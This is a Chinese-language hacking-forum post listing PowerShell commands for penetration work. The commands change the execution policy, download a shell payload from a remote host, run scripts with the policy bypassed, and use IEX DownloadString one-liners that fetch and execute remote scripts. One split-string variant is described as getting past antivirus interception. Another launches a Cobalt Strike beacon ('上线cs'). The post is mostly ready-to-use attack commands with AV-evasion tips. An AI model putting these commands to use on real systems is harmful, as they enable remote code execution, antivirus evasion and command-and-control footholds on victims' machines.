跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

powershell渗透常用命令

set-ExecutionPolicy RemoteSigned //开启执行策略
set-ExecutionPolicy Restricted //关闭执行策略

远程下载文件

powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')

命令行执行ps1文件

powershell.exe -ExecutionPolicy bypass -File "C:\Users\xx\Desktop\test\1.ps1"

远程下载并执行

whoami文件内容

##查看当前权限
$command = "whoami" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -encodedCommand $encodedCommand

正常执行会被AV拦截

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')"

在这里插入图片描述

bypass

先将命令拆分为字符串,然后进行拼接

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'.Replace('11','adString');IEX ($a+$b)"  

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s501Uzpu-1614496550542)(E:\boke\H\powershell\渗透常用命令\img\image-20210110155235161.png)]

上线cs

正常powershell命令

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/muet.ps1')"

拆分命令

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/muet.ps1'')'.Replace('11','adString');IEX ($a+$b)"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TzX8dQPR-1614496550545)(E:\boke\H\powershell\渗透常用命令\img\image-20210110160546727.png)]

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。